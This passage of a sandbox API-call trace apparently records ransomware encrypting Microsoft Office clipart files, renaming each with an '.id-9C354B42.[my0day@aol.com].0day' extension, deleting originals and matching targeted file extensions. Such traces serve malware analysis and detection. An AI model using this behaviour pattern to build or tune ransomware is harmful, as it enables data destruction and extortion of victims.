nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x504a, lpOverlapped=0x0) returned 1 [0057.317] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x5050, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x5050, lpOverlapped=0x0) returned 1 [0057.318] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.318] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.318] SetEndOfFile (hFile=0x208) returned 1 [0057.318] CloseHandle (hObject=0x208) returned 1 [0057.318] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.318] SetEndOfFile (hFile=0x1c4) returned 1 [0057.319] CloseHandle (hObject=0x1c4) returned 1 [0057.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.319] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf")) returned 1 [0057.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0057.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0057.320] lstrlenW (lpString=".doc") returned 4 [0057.320] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.320] lstrlenW (lpString=".docx") returned 5 [0057.320] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.320] lstrlenW (lpString=".pdf") returned 4 [0057.320] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.320] lstrlenW (lpString=".xls") returned 4 [0057.320] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.320] lstrlenW (lpString=".xlsx") returned 5 [0057.320] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.320] lstrlenW (lpString=".ppt") returned 4 [0057.320] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0057.320] lstrlenW (lpString=".zip") returned 4 [0057.320] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.320] lstrlenW (lpString=".rar") returned 4 [0057.320] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.320] lstrlenW (lpString=".bz2") returned 4 [0057.320] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.320] lstrlenW (lpString=".7z") returned 3 [0057.320] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0057.320] lstrlenW (lpString=".dbf") returned 4 [0057.320] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0057.320] lstrlenW (lpString=".1cd") returned 4 [0057.320] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63 [0057.320] lstrlenW (lpString=".jpg") returned 4 [0057.321] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.322] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.322] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.322] GetLastError () returned 0x0 [0057.322] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x34cb, lpOverlapped=0x0) returned 1 [0057.335] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x34d0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x34d0, lpOverlapped=0x0) returned 1 [0057.336] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.336] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.336] SetEndOfFile (hFile=0x208) returned 1 [0057.336] CloseHandle (hObject=0x208) returned 1 [0057.336] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.336] SetEndOfFile (hFile=0x1c4) returned 1 [0057.337] CloseHandle (hObject=0x1c4) returned 1 [0057.337] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.337] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif")) returned 1 [0057.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0057.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0057.338] lstrlenW (lpString=".doc") returned 4 [0057.338] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0057.338] lstrlenW (lpString=".docx") returned 5 [0057.338] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0057.338] lstrlenW (lpString=".pdf") returned 4 [0057.338] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0057.338] lstrlenW (lpString=".xls") returned 4 [0057.338] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0057.338] lstrlenW (lpString=".xlsx") returned 5 [0057.338] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0057.338] lstrlenW (lpString=".ppt") returned 4 [0057.338] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0057.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0057.338] lstrlenW (lpString=".zip") returned 4 [0057.338] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0057.338] lstrlenW (lpString=".rar") returned 4 [0057.338] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0057.338] lstrlenW (lpString=".bz2") returned 4 [0057.338] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0057.338] lstrlenW (lpString=".7z") returned 3 [0057.338] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0057.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0057.338] lstrlenW (lpString=".dbf") returned 4 [0057.339] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0057.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0057.339] lstrlenW (lpString=".1cd") returned 4 [0057.339] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0057.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0057.339] lstrlenW (lpString=".jpg") returned 4 [0057.339] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0057.339] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.339] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.340] GetLastError () returned 0x0 [0057.340] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x4fe6, lpOverlapped=0x0) returned 1 [0057.341] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x4ff0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x4ff0, lpOverlapped=0x0) returned 1 [0057.343] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.343] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.343] SetEndOfFile (hFile=0x208) returned 1 [0057.343] CloseHandle (hObject=0x208) returned 1 [0057.343] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.343] SetEndOfFile (hFile=0x1c4) returned 1 [0057.344] CloseHandle (hObject=0x1c4) returned 1 [0057.345] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.345] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif")) returned 1 [0057.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0057.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0057.345] lstrlenW (lpString=".doc") returned 4 [0057.345] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0057.345] lstrlenW (lpString=".docx") returned 5 [0057.345] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0057.345] lstrlenW (lpString=".pdf") returned 4 [0057.345] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0057.345] lstrlenW (lpString=".xls") returned 4 [0057.345] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0057.345] lstrlenW (lpString=".xlsx") returned 5 [0057.345] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0057.345] lstrlenW (lpString=".ppt") returned 4 [0057.345] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0057.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0057.345] lstrlenW (lpString=".zip") returned 4 [0057.345] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0057.345] lstrlenW (lpString=".rar") returned 4 [0057.345] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0057.346] lstrlenW (lpString=".bz2") returned 4 [0057.346] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0057.346] lstrlenW (lpString=".7z") returned 3 [0057.346] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0057.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0057.346] lstrlenW (lpString=".dbf") returned 4 [0057.346] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0057.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0057.346] lstrlenW (lpString=".1cd") returned 4 [0057.346] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0057.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0057.346] lstrlenW (lpString=".jpg") returned 4 [0057.346] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0057.346] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.346] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.347] GetLastError () returned 0x0 [0057.347] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x3d75, lpOverlapped=0x0) returned 1 [0057.348] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x3d80, lpOverlapped=0x0) returned 1 [0057.349] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.349] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.350] SetEndOfFile (hFile=0x208) returned 1 [0057.350] CloseHandle (hObject=0x208) returned 1 [0057.350] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.350] SetEndOfFile (hFile=0x1c4) returned 1 [0057.351] CloseHandle (hObject=0x1c4) returned 1 [0057.351] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.351] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif")) returned 1 [0057.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0057.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0057.351] lstrlenW (lpString=".doc") returned 4 [0057.351] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0057.351] lstrlenW (lpString=".docx") returned 5 [0057.351] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0057.351] lstrlenW (lpString=".pdf") returned 4 [0057.351] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0057.351] lstrlenW (lpString=".xls") returned 4 [0057.351] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0057.351] lstrlenW (lpString=".xlsx") returned 5 [0057.351] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0057.351] lstrlenW (lpString=".ppt") returned 4 [0057.351] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0057.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0057.351] lstrlenW (lpString=".zip") returned 4 [0057.352] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0057.352] lstrlenW (lpString=".rar") returned 4 [0057.352] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0057.352] lstrlenW (lpString=".bz2") returned 4 [0057.352] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0057.352] lstrlenW (lpString=".7z") returned 3 [0057.352] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0057.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0057.352] lstrlenW (lpString=".dbf") returned 4 [0057.352] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0057.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0057.352] lstrlenW (lpString=".1cd") returned 4 [0057.352] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0057.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0057.352] lstrlenW (lpString=".jpg") returned 4 [0057.352] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0057.352] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.352] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.352] GetLastError () returned 0x0 [0057.353] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x32b6, lpOverlapped=0x0) returned 1 [0057.354] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x32c0, lpOverlapped=0x0) returned 1 [0057.355] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.355] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.355] SetEndOfFile (hFile=0x208) returned 1 [0057.355] CloseHandle (hObject=0x208) returned 1 [0057.355] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.355] SetEndOfFile (hFile=0x1c4) returned 1 [0057.356] CloseHandle (hObject=0x1c4) returned 1 [0057.356] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.356] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf")) returned 1 [0057.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.357] lstrlenW (lpString=".doc") returned 4 [0057.357] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.357] lstrlenW (lpString=".docx") returned 5 [0057.357] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.357] lstrlenW (lpString=".pdf") returned 4 [0057.357] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.357] lstrlenW (lpString=".xls") returned 4 [0057.357] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.357] lstrlenW (lpString=".xlsx") returned 5 [0057.357] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.357] lstrlenW (lpString=".ppt") returned 4 [0057.357] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.357] lstrlenW (lpString=".zip") returned 4 [0057.357] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.357] lstrlenW (lpString=".rar") returned 4 [0057.357] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.357] lstrlenW (lpString=".bz2") returned 4 [0057.357] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.357] lstrlenW (lpString=".7z") returned 3 [0057.357] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.357] lstrlenW (lpString=".dbf") returned 4 [0057.357] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.357] lstrlenW (lpString=".1cd") returned 4 [0057.358] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.358] lstrlenW (lpString=".jpg") returned 4 [0057.358] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.358] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.358] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.358] GetLastError () returned 0x0 [0057.358] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x25ee, lpOverlapped=0x0) returned 1 [0057.429] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x25f0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x25f0, lpOverlapped=0x0) returned 1 [0057.430] ReadFile (in: hFile=0x1c4, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.430] WriteFile (in: hFile=0x208, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.430] SetEndOfFile (hFile=0x208) returned 1 [0057.598] CloseHandle (hObject=0x208) returned 1 [0057.784] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.784] SetEndOfFile (hFile=0x1c4) returned 1 [0057.830] CloseHandle (hObject=0x1c4) returned 1 [0057.830] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.830] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf")) returned 1 [0057.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0057.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0057.831] lstrlenW (lpString=".doc") returned 4 [0057.831] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.831] lstrlenW (lpString=".docx") returned 